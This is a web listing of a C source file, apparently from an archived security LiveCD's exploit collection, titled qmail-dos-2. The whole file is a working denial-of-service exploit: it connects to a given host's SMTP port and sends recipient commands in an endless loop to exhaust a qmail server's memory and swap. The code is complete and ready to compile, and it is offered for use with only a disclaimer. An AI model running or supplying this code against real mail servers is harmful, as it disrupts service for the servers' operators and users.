home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / qmail / qmail.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  77 lines

  1. /*
  2.   * qmail-dos-2 - run a qmail system out of swap space by feeding an infinite
  3.   * amount of recipients.
  4.   *
  5.   * Usage: qmail-dos-2 fully-qualified-hostname
  6.   *
  7.   * Author: Wietse Venema. The author is not responsible for abuse of this
  8.   * program. Use at your own risk.
  9.   */
  10. #include <sys/types.h>
  11. #include <sys/socket.h>
  12. #include <netinet/in.h>
  13. #include <netdb.h>
  14. #include <string.h>
  15. #include <stdarg.h>
  16. #include <errno.h>
  17. #include <stdio.h>
  18.  
  19. void    fatal(char *fmt,...)
  20. {
  21.     va_list ap;
  22.  
  23.     va_start(ap, fmt);
  24.     vfprintf(stderr, fmt, ap);
  25.     va_end(ap);
  26.     putc('\n', stderr);
  27.     exit(1);
  28. }
  29.  
  30. chat(FILE * fp, char *fmt,...)
  31. {
  32.     char    buf[BUFSIZ];
  33.     va_list ap;
  34.  
  35.     fseek(fp, 0L, SEEK_SET);
  36.     va_start(ap, fmt);
  37.     vfprintf(fp, fmt, ap);
  38.     va_end(ap);
  39.     fputs("\r\n", fp);
  40.     if (fflush(fp))
  41.         fatal("connection lost");
  42.     fseek(fp, 0L, SEEK_SET);
  43.     if (fgets(buf, sizeof(buf), fp) == 0)
  44.         fatal("connection lost");
  45.     if (atoi(buf) / 100 != 2)
  46.         fatal("%s", buf);
  47. }
  48.  
  49. int     main(int argc, char **argv)
  50. {
  51.     struct sockaddr_in sin;
  52.     struct hostent *hp;
  53.     char    buf[BUFSIZ];
  54.     int     sock;
  55.     FILE   *fp;
  56.  
  57.     if (argc != 2)
  58.         fatal("usage: %s host", argv[0]);
  59.     if ((hp = gethostbyname(argv[1])) == 0)
  60.         fatal("host %s not found", argv[1]);
  61.     memset((char *) &sin, 0, sizeof(sin));
  62.     sin.sin_family = AF_INET;
  63.     memcpy((char *) &sin.sin_addr, hp->h_addr, sizeof(sin.sin_addr));
  64.     sin.sin_port = htons(25);
  65.     if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  66.         fatal("socket: %s", strerror(errno));
  67.     if (connect(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0)
  68.         fatal("connect to %s: %s", argv[1], strerror(errno));
  69.     if ((fp = fdopen(sock, "r+")) == 0)
  70.         fatal("fdopen: %s", strerror(errno));
  71.     if (fgets(buf, sizeof(buf), fp) == 0)
  72.         fatal("connection lost");
  73.     chat(fp, "mail from:<me@me>", fp);
  74.     for (;;)
  75.         chat(fp, "rcpt to:<me@%s>", argv[1]);
  76. }
  77.